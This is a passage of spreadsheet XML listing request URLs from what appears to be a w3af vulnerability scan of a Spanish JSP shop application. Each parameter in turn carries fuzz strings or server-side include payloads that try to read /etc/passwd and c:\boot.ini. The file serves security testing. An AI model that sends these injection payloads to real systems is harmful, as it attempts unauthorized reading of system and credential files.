    <t>/antoanweb/publico/anadir.jsp?nombre=^(#$!@#$)(()))******&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=^(#$!@#$)(()))******&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=^(#$!@#$)(()))******&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=^(#$!@#$)(()))******&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=^(#$!@#$)(()))******&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=^(#$!@#$)(()))******&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=^(#$!@#$)(()))******&amp;dni=56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^(#$!@#$)(()))******&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=^(#$!@#$)(()))******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frame30.&amp;email=^(#$!@#$)(()))******&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=^(#$!@#$)(()))******&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=^(#$!@#$)(()))******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frame30.&amp;email=w3af@email.com&amp;login=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=^(#$!@#$)(()))******&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=^(#$!@#$)(()))******&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&amp;provincia=0&amp;dni=&amp;direccion=&amp;apellidos=&amp;ciudad=&amp;modo=insertar&amp;nombre=&amp;ntc=&amp;password=&amp;email=&amp;login=</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=^(#$!@#$)(()))******&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=^(#$!@#$)(()))******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^(#$!@#$)(()))******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w3af@email.com&amp;modo=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=^(#$!@#$)(()))******&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=^(#$!@#$)(()))******&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=^(#$!@#$)(()))******&amp;login=56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^(#$!@#$)(()))******&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=^(#$!@#$)(()))******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^(#$!@#$)(()))******&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&amp;provincia=24&amp;dni=&amp;direccion=&amp;apellidos=&amp;ciudad=&amp;modo=insertar&amp;nombre=&amp;ntc=&amp;password=&amp;email=&amp;login=</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=^(#$!@#$)(()))******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^(#$!@#$)(()))******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^(#$!@#$)(()))******&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=^(#$!@#$)(()))******&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=^(#$!@#$)(()))******&amp;provincia=24&amp;login=56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^(#$!@#$)(()))******&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=^(#$!@#$)(()))******&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;!--#include+file="/etc/passwd"--&gt;&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=&lt;!--#include+file="/etc/passwd"--&gt;&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=&lt;!--#include+file="/etc/passwd"--&gt;&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;!--#include+file="/etc/passwd"--&gt;&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=&lt;!--#include+file="/etc/passwd"--&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=&lt;!--#include+file="/etc/passwd"--&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=&lt;!--#include+file="/etc/passwd"--&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;dni=56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&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;!--#include+file="/etc/passwd"--&gt;&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;provincia=50&amp;dni=56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w3af@email.com&amp;login=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=&lt;!--#include+file="/etc/passwd"--&gt;&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=&lt;!--#include+file="/etc/passwd"--&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;!--#include+file="/etc/passwd"--&gt;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56&amp;email=w3af@email.com&amp;modo=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;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56&amp;email=&lt;!--#include+file="/etc/passwd"--&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=&lt;!--#include+file="/etc/passwd"--&gt;&amp;dni=56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56&amp;email=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;login=56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&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=&lt;!--#include+file="/etc/passwd"--&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=&lt;!--#include+file="/etc/passwd"--&gt;&amp;login=56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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;provincia=24&amp;login=56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56&amp;email=&lt;!--#include+file="/etc/passwd"--&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=&lt;!--#include+file="/etc/passwd"--&gt;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56&amp;email=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;!--#include+file="/etc/passwd"--&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;!--#include+file="/etc/passwd"--&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;!--#include+file="/etc/passwd"--&gt;&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;!--#include+file="/etc/passwd"--&gt;&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;!--#include+file="/etc/passwd"--&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;!--#include+file="/etc/passwd"--&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;!--#include+file="/etc/passwd"--&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;!--#include+file="/etc/passwd"--&gt;&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;!--#include+file="/etc/passwd"--&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=&lt;!--#include+file="/etc/passwd"--&gt;&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=&lt;!--#include+file="/etc/passwd"--&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;dni=56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&lt;!--#include+file="/etc/passwd"--&gt;&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=&lt;!--#include+file="/etc/passwd"--&gt;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frame30.&amp;email=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;!--#include+file="/etc/passwd"--&gt;&amp;provincia=50&amp;dni=56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frame30.&amp;email=w3af@email.com&amp;login=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=&lt;!--#include+file="/etc/passwd"--&gt;&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;!--#include+file="/etc/passwd"--&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;!--#include+file="/etc/passwd"--&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
